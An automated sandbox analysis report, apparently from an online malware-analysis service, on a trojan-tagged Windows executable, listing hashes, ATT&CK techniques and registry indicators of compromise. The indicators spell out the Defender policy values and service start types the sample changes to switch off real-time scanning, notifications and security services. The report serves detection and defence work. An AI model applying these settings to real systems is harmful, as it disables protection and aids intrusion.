926369b540e2f133c41d26e5ae36cc36572514e6c376b83dc6a8a676c081a318

Analysis

max time kernel
47s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
20-01-2025 09:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

w10.exe
Size

153KB
MD5

987d8991d5f2bde73d7e33fb5cc12655
SHA1

e5e56a602d7a9a90a75c1a841948f0e10b8144fb
SHA256

926369b540e2f133c41d26e5ae36cc36572514e6c376b83dc6a8a676c081a318
SHA512

94dfb389930d8e7ccb3d791e5df49805becea6a8647199bcb4dfa62f0f0375d01e5f3ecba8b5bf019782a62a71487a5b86f15f933cb22cbedf3cc7ad1bfbbc28
SSDEEP

1536:ZyGpGCbYh23MdKDw5+fkVLu2+BsEOJobqUUk6Q9fmU1shr7v80lDeqUUj6R9fmUG:8GpwnGsExWUf6zVDtUU6qVQyn

Score

10^/10

defense_evasion discovery evasion persistence privilege_escalation trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs 34 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRoutinelyTakingAction = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRoutinelyTakingAction = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScriptScanning = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScriptScanning = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScriptScanning = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe

Modifies Windows Defender notification settings 3 TTPs 8 IoCs

evasion trojan

Windows Service

T1543.003

Modify Registry

T1112

Disable or Modify Tools

T1562.001

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender Security Center\Notifications	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender Security Center\Notifications\DisableEnhancedNotifications = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender Security Center\Notifications	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender Security Center\Notifications	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender Security Center\Notifications\DisableEnhancedNotifications = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender Security Center\Notifications	reg.exe

Modifies security service 2 TTPs 4 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "2"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "2"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"	reg.exe

Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
persistence privilege_escalation

Component Object Model Hijacking
T1546.015

Executes dropped EXE 2 IoCs

pid	Process
9100	FileSyncConfig.exe
1076	OneDrive.exe

Loads dropped DLL 41 IoCs

pid	Process
9100	FileSyncConfig.exe
9100	FileSyncConfig.exe
9100	FileSyncConfig.exe
9100	FileSyncConfig.exe
9100	FileSyncConfig.exe
9100	FileSyncConfig.exe
9100	FileSyncConfig.exe
9100	FileSyncConfig.exe
1076	OneDrive.exe
1076	OneDrive.exe
1076	OneDrive.exe
1076	OneDrive.exe
1076	OneDrive.exe
1076	OneDrive.exe
1076	OneDrive.exe
1076	OneDrive.exe
1076	OneDrive.exe
1076	OneDrive.exe
1076	OneDrive.exe
1076	OneDrive.exe
1076	OneDrive.exe
1076	OneDrive.exe
1076	OneDrive.exe
1076	OneDrive.exe
1076	OneDrive.exe
1076	OneDrive.exe
1076	OneDrive.exe
1076	OneDrive.exe
1076	OneDrive.exe
1076	OneDrive.exe
1076	OneDrive.exe
1076	OneDrive.exe
1076	OneDrive.exe
1076	OneDrive.exe
1076	OneDrive.exe
1076	OneDrive.exe
1076	OneDrive.exe
1076	OneDrive.exe
1076	OneDrive.exe
1076	OneDrive.exe
1076	OneDrive.exe

Modifies system executable filetype association 2 TTPs 5 IoCs

persistence

Modify Registry

T1112

Change Default File Association

T1546.001

description	ioc	Process
Key deleted	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx\ = "{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B}"	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx\ = "{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B}"	OneDrive.exe

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\SecurityHealt = "%C:\\Windows%\\system32\\SecurityHealthSystray.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\SecurityHealt = "%C:\\Windows%\\system32\\SecurityHealthSystray.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\SecurityHealt = "%C:\\Windows%\\system32\\SecurityHealthSystray.exe"	reg.exe

Drops desktop.ini file(s) 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\OneDrive\desktop.ini	FileSyncConfig.exe

Modifies Security services 2 TTPs 22 IoCs

Modifies the startup behavior of a security service.

defense_evasion

Modify Registry

T1112

Impair Defenses

T1562

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisDrv\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisSvc\Start = "3"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdFilter\Start = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisDrv\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisDrv\Start = "3"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SecurityHealthService\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisDrv\Start = "3"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdBoot\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisSvc\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdBoot\Start = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SecurityHealthService\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SecurityHealthService\Start = "3"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SecurityHealthService\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdFilter\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SecurityHealthService\Start = "3"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisSvc\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdFilter\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisSvc\Start = "3"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdFilter\Start = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdBoot\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdBoot\Start = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdBoot\Start = "4"	reg.exe

An obfuscated cmd.exe command-line is typically used to evade detection. 10 IoCs

pid	Process
4800	cmd.exe
3408	cmd.exe
6836	cmd.exe
8068	cmd.exe
916	cmd.exe
6792	cmd.exe
9268	cmd.exe
6156	cmd.exe
2264	Process not Found
8120	Process not Found

Checks system information in the registry 2 TTPs 2 IoCs

System information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer	OneDrive.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName	OneDrive.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\OneDriveSetup.exe	OneDriveSetup.exe

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	OneDriveSetup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	OneDriveSetup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0	OneDrive.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	OneDrive.exe

Modifies Internet Explorer settings 1 TTPs 4 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	OneDriveSetup.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\OneDrive.exe = "11000"	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	OneDrive.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\OneDrive.exe = "11000"	OneDrive.exe

Modifies registry class 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\WOW6432Node\Interface\{ACDB5DB0-C9D5-461C-BAAA-5DCE0B980E40}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\WOW6432Node\Interface\{3A4E62AE-45D9-41D5-85F5-A45B77AB44E5}	OneDrive.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_CLASSES\INTERFACE\{5D5DD08F-A10E-4FEF-BCA7-E73E666FC66C}\PROXYSTUBCLSID32	OneDriveSetup.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_CLASSES\INTERFACE\{2387C6BD-9A36-41A2-88ED-FF731E529384}\PROXYSTUBCLSID32	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Interface\{2B865677-AC3A-43BD-B9E7-BF6FCD3F0596}\ProxyStubClsid32	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\WOW6432Node\Interface\{5D5DD08F-A10E-4FEF-BCA7-E73E666FC66C}\ = "IFileSyncClient8"	OneDrive.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\ShellFolder\Attributes = "4034920525"	FileSyncConfig.exe
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\WOW6432Node\Interface\{1b7aed4f-fcaf-4da4-8795-c03e635d8edc}	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Interface\{02C98E2C-6C9F-49F8-9B57-3A6E1AA09A67}	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\WOW6432Node\Interface\{385ED83D-B50C-4580-B2C3-9E64DBE7F511}	OneDrive.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_CLASSES\FILESYNCCLIENT.FILESYNCCLIENT\CLSID	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\TypeLib\{638805C3-4BA3-4AC8-8AAC-71A0BA2BC284}\1.0\0	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\WOW6432Node\Interface\{8B9F14F4-9559-4A3F-B7D0-312E992B6D98}	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Interface\{869BDA08-7ACF-42B8-91AE-4D8D597C0B33}\TypeLib\ = "{BAE13F6C-0E2A-4DEB-AA46-B8F55319347C}"	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\odopen\DefaultIcon	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Interface\{0f872661-c863-47a4-863f-c065c182858a}\ProxyStubClsid32	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\WOW6432Node\Interface\{0d4e4444-cb20-4c2b-b8b2-94e5656ecae8}\TypeLib	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Interface\{2F12C599-7AA5-407A-B898-09E6E4ED2D1E}\TypeLib\Version = "1.0"	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E}\ = "SyncingOverlayHandler Class"	OneDriveSetup.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance	FileSyncConfig.exe
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\WOW6432Node\CLSID\{6bb93b4e-44d8-40e2-bd97-42dbcf18a40f}\LocalServer32	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Interface\{869BDA08-7ACF-42B8-91AE-4D8D597C0B33}\TypeLib\Version = "1.0"	OneDrive.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_CLASSES\WOW6432NODE\INTERFACE\{8B9F14F4-9559-4A3F-B7D0-312E992B6D98}\TYPELIB	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\WOW6432Node\CLSID\{A3CA1CF4-5F3E-4AC0-91B9-0D3716E1EAC3}\VersionIndependentProgID\ = "SyncEngineStorageProviderHandlerProxy.SyncEngineStorageProviderHandlerProxy"	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Interface\{1196AE48-D92B-4BC7-85DE-664EC3F761F1}\ = "ISyncItemPathCallback"	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Interface\{AEEBAD4E-3E0A-415B-9B94-19C499CD7B6A}\TypeLib\Version = "1.0"	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\TypeLib\{638805C3-4BA3-4AC8-8AAC-71A0BA2BC284}\1.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\19.043.0304.0013"	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\WOW6432Node\Interface\{2692D1F2-2C7C-4AE0-8E73-8F37736C912D}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\WOW6432Node\Interface\{e9de26a1-51b2-47b4-b1bf-c87059cc02a7}	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\WOW6432Node\Interface\{385ED83D-B50C-4580-B2C3-9E64DBE7F511}	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\CLSID\{389510b7-9e58-40d7-98bf-60b911cb0ea9}\ = "FileSyncCustomStatesProvider Class"	OneDriveSetup.exe
